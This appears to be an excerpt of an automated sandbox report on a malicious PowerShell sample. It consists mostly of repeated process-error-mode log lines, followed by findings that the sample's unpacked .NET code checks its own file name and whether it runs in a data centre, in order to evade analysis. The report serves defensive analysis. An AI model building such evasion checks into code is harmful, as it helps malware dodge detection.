                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    .NET source code contains a sample name check
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main contains sample name check
                    Source: 2.2.powershell.exe.2752e96ff18.2.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main contains sample name check
                    Source: 2.2.powershell.exe.2752e9d9ae8.3.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main contains sample name check
                    Source: 2.2.powershell.exe.27536c90000.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main contains sample name check
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main contains sample name check
                    Check if machine is in data center or colocation facility
